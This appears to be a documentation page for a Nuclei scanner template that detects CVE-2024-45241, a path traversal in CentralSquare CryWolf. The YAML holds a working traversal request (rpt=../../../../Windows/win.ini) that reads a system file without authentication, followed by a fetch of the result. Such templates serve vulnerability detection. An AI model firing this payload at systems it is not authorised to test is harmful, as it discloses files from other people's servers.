Skip to content
Nuclei Templates

CentralSquare CryWolf - Path Traversal

ID: CVE-2024-45241

Severity: high

Author: s4e-io

Tags: cve,cve2024,lfi,centralsquare,crywolf

Description

Section titled “Description”

A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.

YAML Source

Section titled “YAML Source”
id: CVE-2024-45241


info:
  name: CentralSquare CryWolf - Path Traversal
  author: s4e-io
  severity: high
  description: |
    A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.
  reference:
    - https://www.tenable.com/cve/CVE-2024-45241
    - https://daly.wtf/cve-2024-45241-path-traversal-in-centralsquare-crywolf/
    - https://github.com/d4lyw/CVE-2024-45241/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45241
    cpe: cpe:2.3:a:centralsquare:crywolf:2024-08-09:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: centralsquare
    product: crywolf
    fofa-query: "False Alarm Reduction Website"
  tags: cve,cve2024,lfi,centralsquare,crywolf


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Powered by CryWolf")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        GET /gdoc1.ashx HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - 'contains(content_type,"application/pdf")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402201d5a08d9fea27510bc40536d01eefae8e030a763298150398a4bb11de5e83e720220255684832805f7141e44e0e65d27772ec2d0e27817269fd03a542182aa252898:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-45241.yaml"

View on Github